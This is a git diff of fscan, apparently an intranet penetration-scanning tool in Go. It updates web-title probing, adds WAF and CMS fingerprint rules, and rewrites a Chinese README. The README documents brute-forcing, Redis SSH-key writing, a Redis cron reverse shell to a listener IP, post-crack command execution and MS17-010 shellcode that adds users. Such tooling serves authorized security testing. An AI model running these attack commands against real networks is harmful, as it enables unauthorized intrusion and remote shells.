+	}
+
+	if result == "https" && !strings.HasPrefix(info.Url, "https://") {
+		info.Url = strings.Replace(info.Url, "http://", "https://", 1)
+		err, result, CheckData = geturl(info, 1, CheckData)
+		//有跳转
+		if strings.Contains(result, "://") {
+			info.Url = result
+			err, result, CheckData = geturl(info, 3, CheckData)
+			if err != nil {
+				return
+			}
+		}
+	}
+	//是否访问图标
+	//err, _, CheckData = geturl(info, 2, CheckData)
+	if err != nil {
+		return
+	}
+	return
+}
+
+func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (error, string, []WebScan.CheckDatas) {
+	//flag 1 first try
+	//flag 2 /favicon.ico
+	//flag 3 302
+	//flag 4 400 -> https
+
+	Url := info.Url
+	if flag == 2 {
+		URL, err := url.Parse(Url)
 		if err == nil {
-			WebScan.WebScan(info)
+			Url = fmt.Sprintf("%s://%s/favicon.ico", URL.Scheme, URL.Host)
+		} else {
+			Url += "/favicon.ico"
+		}
+	}
+	req, err := http.NewRequest("GET", Url, nil)
+	if err != nil {
+		return err, "", CheckData
+	}
+	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+	req.Header.Set("Accept", "*/*")
+	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
+	req.Header.Set("Cookie", common.Cookie)
+	//if common.Pocinfo.Cookie != "" {
+	//	req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
+	//} else {
+	//	req.Header.Set("Cookie", "rememberMe=1")
+	//}
+	req.Header.Set("Connection", "close")
+	var client *http.Client
+	if flag == 1 {
+		client = lib.ClientNoRedirect
+	} else {
+		client = lib.Client
+	}
+
+	resp, err := client.Do(req)
+	if err != nil {
+		return err, "https", CheckData
+	}
+
+	defer resp.Body.Close()
+	var title string
+	body, err := getRespBody(resp)
+	if err != nil {
+		return err, "https", CheckData
+	}
+	if !utf8.Valid(body) {
+		body, _ = simplifiedchinese.GBK.NewDecoder().Bytes(body)
+	}
+	CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
+	var reurl string
+	if flag != 2 {
+		title = gettitle(body)
+		length := resp.Header.Get("Content-Length")
+		if length == "" {
+			length = fmt.Sprintf("%v", len(body))
+		}
+		redirURL, err1 := resp.Location()
+		if err1 == nil {
+			reurl = redirURL.String()
+		}
+		result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
+		if reurl != "" {
+			result += fmt.Sprintf(" 跳转url: %s", reurl)
+		}
+		common.LogSuccess(result)
+	}
+	if reurl != "" {
+		return nil, reurl, CheckData
+	}
+	if resp.StatusCode == 400 && !strings.HasPrefix(info.Url, "https") {
+		return nil, "https", CheckData
+	}
+	return nil, "", CheckData
+}
+
+func getRespBody(oResp *http.Response) ([]byte, error) {
+	var body []byte
+	if oResp.Header.Get("Content-Encoding") == "gzip" {
+		gr, err := gzip.NewReader(oResp.Body)
+		if err != nil {
+			return nil, err
+		}
+		defer gr.Close()
+		for {
+			buf := make([]byte, 1024)
+			n, err := gr.Read(buf)
+			if err != nil && err != io.EOF {
+				return nil, err
+			}
+			if n == 0 {
+				break
+			}
+			body = append(body, buf...)
 		}
 	} else {
-		WebScan.WebScan(info)
-	}
-	return err, result
-}
-
-func geturl(info *common.HostInfo) (err error, result string) {
-	url := info.Url
-	tr := &http.Transport{
-		TLSClientConfig:   &tls.Config{InsecureSkipVerify: true},
-		DisableKeepAlives: false,
-		DialContext: (&net.Dialer{
-			Timeout:   time.Duration(info.WebTimeout) * time.Second,
-			KeepAlive: time.Duration(info.WebTimeout+3) * time.Second,
-		}).DialContext,
-		MaxIdleConns:        1000,
-		MaxIdleConnsPerHost: 1000,
-		IdleConnTimeout:     time.Duration(info.WebTimeout+3) * time.Second,
-		TLSHandshakeTimeout: 5 * time.Second,
-	}
-
-	var client = &http.Client{Timeout: time.Duration(info.WebTimeout) * time.Second, Transport: tr}
-	res, err := http.NewRequest("GET", url, nil)
-	if err == nil {
-		res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-		res.Header.Add("Accept", "*/*")
-		res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
-		res.Header.Add("Accept-Encoding", "gzip, deflate")
-		res.Header.Add("Connection", "close")
-		resp, err := client.Do(res)
-		if err == nil {
-			defer resp.Body.Close()
-			var title string
-			body, _ := ioutil.ReadAll(resp.Body)
-			re := regexp.MustCompile("<title>(.*)</title>")
-			find := re.FindAllStringSubmatch(string(body), -1)
-			if len(find) > 0 {
-				title = find[0][1]
-				if len(title) > 100 {
-					title = title[:100]
-				}
-			} else {
-				title = "None"
-			}
-			result = fmt.Sprintf("WebTitle:%-25v %-3v %v", url, resp.StatusCode, title)
-			common.LogSuccess(result)
-			if resp.StatusCode == 400 && info.Url[:5] != "https" {
-				info.Url = strings.Replace(info.Url, "http://", "https://", 1)
-				return err, "https"
-			}
-			return err, result
+		raw, err := ioutil.ReadAll(oResp.Body)
+		if err != nil {
+			return nil, err
 		}
-		return err, ""
+		body = raw
 	}
-	return err, ""
+	return body, nil
+}
+
+func gettitle(body []byte) (title string) {
+	re := regexp.MustCompile("(?ims)<title>(.*?)</title>")
+	find := re.FindSubmatch(body)
+	if len(find) > 1 {
+		title = string(find[1])
+		title = strings.TrimSpace(title)
+		title = strings.Replace(title, "\n", "", -1)
+		title = strings.Replace(title, "\r", "", -1)
+		title = strings.Replace(title, "&nbsp;", " ", -1)
+		if len(title) > 100 {
+			title = title[:100]
+		}
+	}
+	if title == "" {
+		title = "None"
+	}
+	return
+}
+
+func GetProtocol(host string, Timeout int64) (protocol string) {
+	protocol = "http"
+	//如果端口是80或443,跳过Protocol判断
+	if strings.HasSuffix(host, ":80") || !strings.Contains(host, ":") {
+		return
+	} else if strings.HasSuffix(host, ":443") {
+		protocol = "https"
+		return
+	}
+
+	socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
+	if err != nil {
+		return
+	}
+	conn := tls.Client(socksconn, &tls.Config{InsecureSkipVerify: true})
+	defer func() {
+		if conn != nil {
+			defer func() {
+				if err := recover(); err != nil {
+					common.LogError(err)
+				}
+			}()
+			conn.Close()
+		}
+	}()
+	conn.SetDeadline(time.Now().Add(time.Duration(Timeout) * time.Second))
+	err = conn.Handshake()
+	if err == nil || strings.Contains(err.Error(), "handshake failure") {
+		protocol = "https"
+	}
+	return protocol
 }
--- a/README.md
+++ b/README.md
@@ -1,109 +1,158 @@
 # fscan

-# 简介
-一款内网扫描工具，方便一键大保健。    
-支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息、web漏洞扫描等。  
-趁着最近有空，用go把f-scrack重构了一遍。使用go来编写，也有更好的扩展性及兼容性。  
-还在逐步增加功能，欢迎各位师傅提意见。
+# 1. 简介
+一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。   
+支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

+# 2. 主要功能
+1.信息搜集:
+* 存活探测(icmp)
+* 端口扫描

-## why
-为什么有LadonGo、x-crack 、tscan、Gscan 这些工具了还要写fscan  
+2.爆破功能:
+* 各类服务爆破(ssh、smb、rdp等)
+* 数据库密码爆破(mysql、mssql、redis、psql、oracle等)  

-答：  
-   因为用习惯了f-scrack，习惯一条命令跑完所有模块，省去一个个模块单独调用的时间，当然我附加了-m 指定模块的功能。
+3.系统信息、漏洞扫描:  
+* netbios探测、域控识别  
+* 获取目标网卡信息
+* 高危漏洞扫描(ms17010等)  

-## 最近更新
-[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。   
-   修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度    
-[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试    
-[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)  
-[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。  
-[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。   
-[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。    
-[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段  
-[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
+4.Web探测功能:
+* webtitle探测
+* web指纹识别(常见cms、oa框架等)
+* web漏洞扫描(weblogic、st2等,支持xray的poc)

-## usege
+5.漏洞利用:
+* redis写公钥或写计划任务  
+* ssh命令执行  
+* ms17017利用(植入shellcode),如添加用户等  
+
+6.其他功能:
+* 文件保存
+
+# 3. 使用说明
 简单用法
 ``` 
-go run main.go -h 192.168.1.1/24
 fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
-fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)
+fscan.exe -h 192.168.1.1/16  (B段扫描)
+```
+
+其他用法
+```
+fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
+fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
 fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
 fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)
 fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
+fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
+fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
+fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
+fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
 fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
+fscan.exe -hf ip.txt  (以文件导入)
+fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
+fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
+fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
+fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080
+fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
 ```
+编译命令
 ```
-h 192.168.1.1/24 (C段)  
-h 192.168.1.1/16 (B段)
-h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
-hf ip.txt  (以文件导入)
+go build -ldflags="-s -w " -trimpath main.go
+upx -9 fscan.exe (可选,压缩体积)
 ```

-
 完整参数
 ```
-  -Num int
-        poc rate (default 20)
  -c string
-        exec command (ssh)
+        ssh命令执行
+  -cookie string
+        设置cookie
+  -debug int
+        多久没响应,就打印当前进度(default 60)
  -domain string
-        smb domain
+        smb爆破模块时,设置域名
  -h string
-        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
+        目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
-        host file, -hs ip.txt
-  -it int
-        Icmp Threads nums (default 11000)
+        读取文件中的目标
+  -hn string
+        扫描时,要跳过的ip: -hn 192.168.1.1/24
  -m string
-        Select scan type ,as: -m ssh (default "all")
+        设置扫描模式: -m ssh (default "all")
  -no
-        not to save output log
+        扫描结果不保存到文件中
+  -nobr
+        跳过sql、ftp、ssh等的密码爆破
  -nopoc
-        not to scan web vul
+        跳过web poc扫描
  -np
-        not to ping
+        跳过存活探测
+  -num int
+        web poc 发包速率  (default 20)
  -o string
-        Outputfile (default "result.txt")
+        扫描结果保存到哪 (default "result.txt")
  -p string
-        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017")
+        设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
+  -pa string
+        新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
+  -path string
+        fcgi、smb romote file path
  -ping
-        using ping replace icmp
+        使用ping代替icmp进行存活探测
+  -pn string
+        扫描时要跳过的端口,as: -pn 445
  -pocname string
-        use the pocs these contain pocname, -pocname weblogic
+        指定web poc的模糊名字, -pocname weblogic
  -proxy string
-        set poc proxy, -proxy http://127.0.0.1:8080
-  -pwd string
-        password
-  -pwdf string
-        password file
-  -rf string
-        redis file to write sshkey file (as: -rf id_rsa.pub)
-  -rs string
-        redis shell to write cron file (as: -rs 192.168.1.1:6666)
-  -t int
-        Thread nums (default 200)
-  -time int
-        Set timeout (default 3)
+        设置代理, -proxy http://127.0.0.1:8080
  -user string
-        username
+        指定爆破时的用户名
  -userf string
-        username file
+        指定爆破时的用户名文件
+  -pwd string
+        指定爆破时的密码
+  -pwdf string
+        指定爆破时的密码文件
+  -rf string
+        指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
+  -rs string
+        redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
+  -silent
+        静默扫描,适合cs扫描时不回显
+  -sshkey string
+        ssh连接时,指定ssh私钥
+  -t int
+        扫描线程 (default 600)
+  -time int
+        端口扫描超时时间 (default 3)
+  -u string
+        指定Url扫描
+  -uf string
+        指定Url文件扫描
  -wt int
-        Set web timeout (default 3)
-
+        web访问超时时间 (default 5)
+  -pocpath string
+        指定poc路径
+  -usera string
+        在原有用户字典基础上,新增新用户
+  -pwda string
+        在原有密码字典基础上,增加新密码
+  -socks5
+        指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)
+  -sc 
+        指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)
 ```

-## 运行截图
+# 4. 运行截图

 `fscan.exe -h 192.168.x.x  (全功能、ms17010、读取网卡信息)`
 ![](image/1.png)

 ![](image/4.png)

-`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
+`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)`
 ![](image/2.png)

 `fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
@@ -112,16 +161,75 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
 `fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
 ![](image/2020-12-12-13-34-44.png)

-## 未来计划
-[*] 合理输出当前扫描进度  
-[*] 增加内网常见高危漏洞  
-[*] 增加高危web漏洞扫描  
-[*] 师傅们觉得有必要加的漏洞，也可以提issue  
+`fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)`
+![](image/netbios.png)
+
+`go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
+![](image/netbios1.png)
+
+`go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
+![img.png](image/live.png)
+
+# 5. 免责声明
+
+本工具仅面向**合法授权**的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。
+
+为避免被恶意使用，本项目所有收录的poc均为漏洞的理论判断，不存在漏洞利用过程，不会对目标发起真实攻击和漏洞利用。
+
+在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。**请勿对非授权目标进行扫描。**
+
+如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。
+
+在安装并使用本工具前，请您**务必审慎阅读、充分理解各条款内容**，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
+除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。


-## 参考链接
+# 6. 404StarLink 2.0 - Galaxy
+![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
+
+fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环，如果对fscan 有任何疑问又或是想要找小伙伴交流，可以参考星链计划的加群方式。
+
+- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
+
+
+# 7. Star Chart
+[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
+
+# 8. 捐赠
+ 如果你觉得这个项目对你有帮助，你可以请作者喝饮料🍹 [点我](image/sponsor.png)
+
+# 9. 参考链接
 https://github.com/Adminisme/ServerScan  
 https://github.com/netxfly/x-crack  
 https://github.com/hack2fun/Gscan  
 https://github.com/k8gege/LadonGo   
-https://github.com/jjf012/gopoc
+https://github.com/jjf012/gopoc
+
+
+# 10. 最近更新
+[+] 2022/7/2 加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。  
+新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。    
+[+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程  
+[+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito  
+[+] 2022/1/11 新增oracle密码爆破  
+[+] 2022/1/7  扫ip/8时,默认会扫每个C段的网关和数个随机IP,推荐参数:-h ip/8 -m icmp.新增LiveTop功能,检测存活时,默认会输出top10的B、C段ip存活数量.  
+[+] 2021/12/7 新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上,新增该端口)  
+[+] 2021/12/1 优化xray解析模块,支持groups、新增poc,加入https判断(tls握手包),优化ip解析模块(支持所有ip/xx),增加爆破关闭参数 -nobr,添加跳过某些ip扫描功能 -hn 192.168.1.1,添加跳过某些端口扫描功能-pn 21,445,增加扫描docker未授权漏洞  
+[+] 2021/6/18 改善一下poc的机制，如果识别出指纹会根据指纹信息发送poc，如果没有识别到指纹才会把所有poc打一遍  
+[+] 2021/5/29 加入fcgi协议未授权命令执行扫描,优化poc模块,优化icmp模块,ssh模块加入私钥连接  
+[+] 2021/5/15 新增win03版本(删减了xray_poc模块),增加-silent 静默扫描模式,添加web指纹,修复netbios模块数组越界,添加一个CheckErrs字典,webtitle 增加gzip解码  
+[+] 2021/5/6 更新mod库、poc、指纹。修改线程处理机制、netbios探测、域控识别模块、webtitle编码模块等  
+[+] 2021/4/22 修改webtitle模块,加入gbk解码  
+[+] 2021/4/21 加入netbios探测、域控识别  
+[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描  
+[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml  
+[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。  
+[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。   
+修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度    
+[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试    
+[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)  
+[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。  
+[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。   
+[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。    
+[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段  
+[+] 2020/11/15 支持ip以文件导入,-hf ip.txt,并对去重做了处理
--- a/WebScan/InfoScan.go
+++ b/WebScan/InfoScan.go
@@ -0,0 +1,69 @@
+package WebScan
+
+import (
+	"crypto/md5"
+	"fmt"
+	"github.com/shadow1ng/fscan/WebScan/info"
+	"github.com/shadow1ng/fscan/common"
+	"regexp"
+)
+
+type CheckDatas struct {
+	Body    []byte
+	Headers string
+}
+
+func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
+	var matched bool
+	var infoname []string
+
+	for _, data := range *CheckData {
+		for _, rule := range info.RuleDatas {
+			if rule.Type == "code" {
+				matched, _ = regexp.MatchString(rule.Rule, string(data.Body))
+			} else {
+				matched, _ = regexp.MatchString(rule.Rule, data.Headers)
+			}
+			if matched == true {
+				infoname = append(infoname, rule.Name)
+			}
+		}
+		//flag, name := CalcMd5(data.Body)
+
+		//if flag == true {
+		//	infoname = append(infoname, name)
+		//}
+	}
+
+	infoname = removeDuplicateElement(infoname)
+
+	if len(infoname) > 0 {
+		result := fmt.Sprintf("[+] InfoScan:%-25v %s ", Url, infoname)
+		common.LogSuccess(result)
+		return infoname
+	}
+	return []string{""}
+}
+
+func CalcMd5(Body []byte) (bool, string) {
+	has := md5.Sum(Body)
+	md5str := fmt.Sprintf("%x", has)
+	for _, md5data := range info.Md5Datas {
+		if md5str == md5data.Md5Str {
+			return true, md5data.Name
+		}
+	}
+	return false, ""
+}
+
+func removeDuplicateElement(languages []string) []string {
+	result := make([]string, 0, len(languages))
+	temp := map[string]struct{}{}
+	for _, item := range languages {
+		if _, ok := temp[item]; !ok {
+			temp[item] = struct{}{}
+			result = append(result, item)
+		}
+	}
+	return result
+}
--- a/WebScan/WebScan.go
+++ b/WebScan/WebScan.go
@@ -6,41 +6,93 @@ import (
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
 	"net/http"
-	"time"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
 )

 //go:embed pocs
 var Pocs embed.FS
+var once sync.Once
+var AllPocs []*lib.Poc

 func WebScan(info *common.HostInfo) {
+	once.Do(initpoc)
 	var pocinfo = common.Pocinfo
-	pocinfo.Target = info.Url
-	err := Execute(pocinfo)
-	if err != nil && common.LogErr {
-		fmt.Println(info.Url, err)
+	buf := strings.Split(info.Url, "/")
+	pocinfo.Target = strings.Join(buf[:3], "/")
+
+	if pocinfo.PocName != "" {
+		Execute(pocinfo)
+	} else {
+		for _, infostr := range info.Infostr {
+			pocinfo.PocName = lib.CheckInfoPoc(infostr)
+			Execute(pocinfo)
+		}
 	}
 }

-func Execute(PocInfo common.PocInfo) error {
-	//PocInfo.Proxy = "http://127.0.0.1:8080"
-	err := lib.InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
-	if err != nil {
-		return err
-	}
+func Execute(PocInfo common.PocInfo) {
 	req, err := http.NewRequest("GET", PocInfo.Target, nil)
 	if err != nil {
-		return err
+		errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
+		common.LogError(errlog)
+		return
 	}
 	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-	if PocInfo.Cookie != "" {
-		req.Header.Set("Cookie", PocInfo.Cookie)
+	if common.Cookie != "" {
+		req.Header.Set("Cookie", common.Cookie)
 	}
-
-	if PocInfo.PocName != "" {
-		lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
-	} else {
-		lib.CheckMultiPoc(req, Pocs, PocInfo.Num, "")
-	}
-
-	return nil
+	pocs := filterPoc(PocInfo.PocName)
+	lib.CheckMultiPoc(req, pocs, common.PocNum)
+}
+
+func initpoc() {
+	if common.PocPath == "" {
+		entries, err := Pocs.ReadDir("pocs")
+		if err != nil {
+			fmt.Printf("[-] init poc error: %v", err)
+			return
+		}
+		for _, one := range entries {
+			path := one.Name()
+			if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
+				if poc, _ := lib.LoadPoc(path, Pocs); poc != nil {
+					AllPocs = append(AllPocs, poc)
+				}
+			}
+		}
+	} else {
+		err := filepath.Walk(common.PocPath,
+			func(path string, info os.FileInfo, err error) error {
+				if err != nil || info == nil {
+					return err
+				}
+				if !info.IsDir() {
+					if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
+						poc, _ := lib.LoadPocbyPath(path)
+						if poc != nil {
+							AllPocs = append(AllPocs, poc)
+						}
+					}
+				}
+				return nil
+			})
+		if err != nil {
+			fmt.Printf("[-] init poc error: %v", err)
+		}
+	}
+}
+
+func filterPoc(pocname string) (pocs []*lib.Poc) {
+	if pocname == "" {
+		return AllPocs
+	}
+	for _, poc := range AllPocs {
+		if strings.Contains(poc.Name, pocname) {
+			pocs = append(pocs, poc)
+		}
+	}
+	return
 }
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -0,0 +1,316 @@
+package info
+
+type RuleData struct {
+	Name string
+	Type string
+	Rule string
+}
+
+type Md5Data struct {
+	Name   string
+	Md5Str string
+}
+
+type PocData struct {
+	Name  string
+	Alias string
+}
+
+var RuleDatas = []RuleData{
+	{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
+	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
+	{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
+	{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
+	{"绿盟防火墙", "code", "(NSFOCUS NF)"},
+	{"绿盟防火墙", "headers", "(NSFocus)"},
+	{"Topsec-Waf", "index", `(<META NAME="Copyright" CONTENT="Topsec Network Security Technology Co.,Ltd"/>","<META NAME="DESCRIPTION" CONTENT="Topsec web UI"/>)`},
+	{"Anquanbao", "headers", "(Anquanbao)"},
+	{"BaiduYunjiasu", "headers", "(yunjiasu)"},
+	{"BigIP", "headers", "(BigIP|BIGipServer)"},
+	{"BinarySEC", "headers", "(binarysec)"},
+	{"BlockDoS", "headers", "(BlockDos.net)"},
+	{"CloudFlare", "headers", "(cloudflare)"},
+	{"Cloudfront", "headers", "(cloudfront)"},
+	{"Comodo", "headers", "(Protected by COMODO)"},
+	{"IBM-DataPower", "headers", "(X-Backside-Transport)"},
+	{"DenyAll", "headers", "(sessioncookie=)"},
+	{"dotDefender", "headers", "(dotDefender)"},
+	{"Incapsula", "headers", "(X-CDN|Incapsula)"},
+	{"Jiasule", "headers", "(jsluid=)"},
+	{"KONA", "headers", "(AkamaiGHost)"},
+	{"ModSecurity", "headers", "(Mod_Security|NOYB)"},
+	{"NetContinuum", "headers", "(Cneonction|nnCoection|citrix_ns_id)"},
+	{"Newdefend", "headers", "(newdefend)"},
+	{"Safe3", "headers", "(Safe3WAF|Safe3 Web Firewall)"},
+	{"Safedog", "code", "(404.safedog.cn/images/safedogsite/broswer_logo.jpg)"},
+	{"Safedog", "headers", "(Safedog|WAF/2.0)"},
+	{"SonicWALL", "headers", "(SonicWALL)"},
+	{"Stingray", "headers", "(X-Mapping-)"},
+	{"Sucuri", "headers", "(Sucuri/Cloudproxy)"},
+	{"Usp-Sec", "headers", "(Secure Entry Server)"},
+	{"Varnish", "headers", "(varnish)"},
+	{"Wallarm", "headers", "(wallarm)"},
+	{"阿里云", "code", "(errors.aliyun.com)"},
+	{"WebKnight", "headers", "(WebKnight)"},
+	{"Yundun", "headers", "(YUNDUN)"},
+	{"Yunsuo", "headers", "(yunsuo)"},
+	{"Coding pages", "header", "(Coding Pages)"},
+	{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
+	{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
+	{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
+	{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
+	{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
+	{"Nexus", "code", "(Nexus Repository Manager)"},
+	{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
+	{"Harbor", "code", "(<title>Harbor</title>)"},
+	{"Harbor", "cookie", "(harbor-lang)"},
+	{"禅道", "code", "(/theme/default/images/main/zt-logo.png)"},
+	{"禅道", "cookie", "(zentaosid)"},
+	{"协众OA", "code", "(Powered by 协众OA)"},
+	{"协众OA", "cookie", "(CNOAOASESSID)"},
+	{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
+	{"atmail-WebMail", "cookie", "(atmail6)"},
+	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
+	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
